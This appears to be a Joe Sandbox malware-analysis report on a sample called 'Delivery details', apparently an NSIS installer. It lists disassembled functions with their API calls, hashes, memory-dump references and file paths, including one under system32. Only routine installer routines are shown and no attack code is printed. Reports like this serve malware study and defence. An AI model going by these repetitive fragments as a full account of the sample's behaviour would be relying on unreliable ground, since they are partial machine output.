                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$(7B
                                                                  • API String ID: 3540041739-1320723960
                                                                  • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                  • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                                  • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                  • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926
                                                                  • GetLastError.KERNEL32 ref: 0040593A
                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                  • GetLastError.KERNEL32 ref: 00405959
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-1246513382
                                                                  • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                  • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                                  • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                  • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                  • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 1ea1aa3a4bcd63a739838081bd04b2b88c3f6ba45a3f467952025c05557b9ef3
                                                                  • Instruction ID: a606f7d5b7d9f25f85f3a996f6cf1d54ca927bfb9af82e5c1f6e8eb7e31f2730
                                                                  • Opcode Fuzzy Hash: 1ea1aa3a4bcd63a739838081bd04b2b88c3f6ba45a3f467952025c05557b9ef3
                                                                  • Instruction Fuzzy Hash: 88F0FF72604518AFDB01DBE4DF88CEEB7BCEB08341B14047AF641F61A1CA749D518B78
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                  • Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
                                                                  • Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
                                                                  • Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,C:\Windows\system32\trommede.Bov,00000400,?,?,00000021), ref: 004025E2
                                                                  • lstrlenA.KERNEL32(C:\Windows\system32\trommede.Bov,?,?,0040B5D8,000000FF,C:\Windows\system32\trommede.Bov,00000400,?,?,00000021), ref: 004025ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                  • String ID: C:\Windows\system32\trommede.Bov
                                                                  • API String ID: 3109718747-2695231187
                                                                  • Opcode ID: f874f6638e6c7012de2fa98dcecffd1fa0cc6476bd4a08a5713b7dee10837727
                                                                  • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                  • Opcode Fuzzy Hash: f874f6638e6c7012de2fa98dcecffd1fa0cc6476bd4a08a5713b7dee10837727
                                                                  • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA3
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-823278215
                                                                  • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                  • Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
                                                                  • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                  • Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Enum
                                                                  • String ID:
                                                                  • API String ID: 464197530-0
                                                                  • Opcode ID: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                  • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                                  • Opcode Fuzzy Hash: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
                                                                  • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                    • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D3A
                                                                    • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                    • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                  • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405DE2
                                                                  • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405DF2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: 0_B
                                                                  • API String ID: 3248276644-2128305573
                                                                  • Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                  • Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
                                                                  • Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
                                                                  • Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 004053B7
                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                                    • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                  • Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
                                                                  • Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
                                                                  • Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,00403A00,75923420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
                                                                  • GlobalFree.KERNEL32(?), ref: 00403A4A
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: Free$GlobalLibrary
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 1100898210-823278215
                                                                  • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                  • Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
                                                                  • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                  • Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CD3
                                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-1246513382
                                                                  • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                  • Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
                                                                  • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
                                                                  • Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                  • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2044229800.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2044204019.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044252103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044265688.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2044404643.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Delivery details.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
